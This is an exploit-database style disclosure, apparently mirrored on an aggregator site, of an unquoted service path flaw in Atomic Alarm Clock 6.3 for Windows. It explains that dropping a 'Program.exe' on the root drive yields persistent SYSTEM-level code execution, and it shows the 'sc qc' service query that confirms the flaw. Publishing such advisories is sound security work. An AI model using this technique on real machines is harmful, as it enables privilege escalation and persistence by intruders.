atomic alarm clock x86 6.3 atomicalarmclock unquoted service path
▸▸▸ Exploit & Vulnerability >> local exploit & windows_x86 vulnerability
# Exploit Title: Atomic Alarm Clock x86 6.3 - 'AtomicAlarmClock' Unquoted Service Path # Exploit Author: boku # Date: 2020-04-17 # Vendor Homepage: http://www.drive-software.com # Software Link: http://www.drive-software.com/download/ataclock.exe # Version: 6.3 # Tested On: Windows 10 Pro 1909 (32-bit) # Vulnerability Type: Local Privilege Escalation by unquoted service path owned by 'LocalSystem'. # Vulnerability Description: # The Atomic Alarm Clock service "timeserv.exe" will load an arbitrary EXE and execute it with SYSTEM integrity. # This security misconfiguration by the vendor can be exploited locally or as part of an attack chain. # By placing a file named "Program.exe" on the root drive, an attacker can obtain persistent arbitrary code execution. # Under normal environmental conditions, this exploit ensures escalation of privileges from Admin to SYSTEM. C:\Users\boku>sc qc AtomicAlarmClock [SC] QueryServiceConfig SUCCESS SERVICE_NAME: AtomicAlarmClock TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\Atomic Alarm Clock\timeserv.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Atomic Alarm Clock Time DEPENDENCIES : SERVICE_START_NAME : LocalSystem
Atomic alarm clock x86 6.3 atomicalarmclock unquoted service path Vulnerability / Exploit Source : Atomic alarm clock x86 6.3 atomicalarmclock unquoted service path